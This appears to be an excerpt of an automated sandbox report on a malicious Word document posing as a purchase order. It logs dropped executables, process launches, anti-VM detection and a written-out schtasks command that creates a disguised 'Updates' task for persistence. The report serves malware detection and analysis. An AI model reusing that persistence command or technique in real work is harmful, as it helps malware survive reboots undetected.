                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_0033AB184_2_0033AB18
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_00332D784_2_00332D78
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_00330EA84_2_00330EA8
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_003348374_2_00334837
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_003348484_2_00334848
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_00334A984_2_00334A98
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_0033AB084_2_0033AB08
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_004022967_2_00402296
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_003653387_2_00365338
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_003663507_2_00366350
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_003656807_2_00365680
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_003620917_2_00362091
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A47CA87_2_00A47CA8
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A4B03B7_2_00A4B03B
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A4DBB87_2_00A4DBB8
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A461E87_2_00A461E8
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A40B087_2_00A40B08
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A4B6207_2_00A4B620
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A421807_2_00A42180
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 7_2_00A447007_2_00A44700
                      Source: TrC86HH4pxVZ49N[1].exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: pridingnsjhfhdjs.exe.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: DsVdJeRPpef.exe.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: TrC86HH4pxVZ49N[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: pridingnsjhfhdjs.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: DsVdJeRPpef.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.pridingnsjhfhdjs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@8/15@9/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vised Purchase Order 1214.docJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeMutant created: \Sessions\1\BaseNamedObjects\uslNAKA
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD519.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....0.......h...............#u................................................................#.....Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Revised Purchase Order 1214.docVirustotal: Detection: 45%
                      Source: Revised Purchase Order 1214.docReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exe C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeCode function: 4_2_0033981B push cs; retf 4_2_0033981C
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.69951129181
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.69951129181
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.69951129181
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeFile created: C:\Users\user\AppData\Roaming\DsVdJeRPpef.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TrC86HH4pxVZ49N[1].exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\DsVdJeRPpef' /XML 'C:\Users\user\AppData\Local\Temp\tmp40B9.tmp'
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\pridingnsjhfhdjs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: 00000004.00000002.2139955625.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2139978034.000000000249C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pridingnsjhfhdjs.exe PID: 260, type: MEMORY
